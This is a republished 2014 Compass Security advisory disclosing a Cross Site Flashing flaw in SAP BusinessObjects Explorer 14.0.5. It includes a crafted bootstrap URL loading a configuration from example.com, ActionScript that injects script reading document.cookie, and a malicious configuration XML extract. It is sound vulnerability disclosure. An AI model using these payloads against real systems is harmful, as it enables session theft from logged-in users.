Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31160
HistoryOct 14, 2014 - 12:00 a.m.

SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

2014-10-1400:00:00
vulners.com
138
JSON

#######################################################################

COMPASS SECURITY ADVISORY

http://www.csnc.ch/en/downloads/advisories.html

#######################################################################

Product: BusinessObjects Explorer

Vendor: SAP AG

Subject: Cross Site Flashing

Risk: High

Effect: Remotely exploitable

Author: Stefan Horlacher

Date: 2014-10-10

SAP Security Note: 1908647 [0]

#######################################################################

Abstract:

BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.

Affected:

Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:

The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and specify a
configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in
possession of valid credentials. The configuration file specified in
the configURL parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file, which injects JavaScript into the DOM of the
originating domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml


Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
	package
	{
		import flash.display.Sprite;
		import flash.events.Event;
		import flash.external.ExternalInterface;

		public class Main extends Sprite
		{
			public function Main():void
			{
				ExternalInterface.call("document.write",
				"<script>alert(document.cookie)</script>");
			}
		}
	}

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
	<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
		p:codebase="plugins/">
	<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
		p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
	<p:bundles>
		<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
		<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
		<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
		<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
	[CUT BY COMPASS]

Timeline:

2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory

References:

[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project

JSON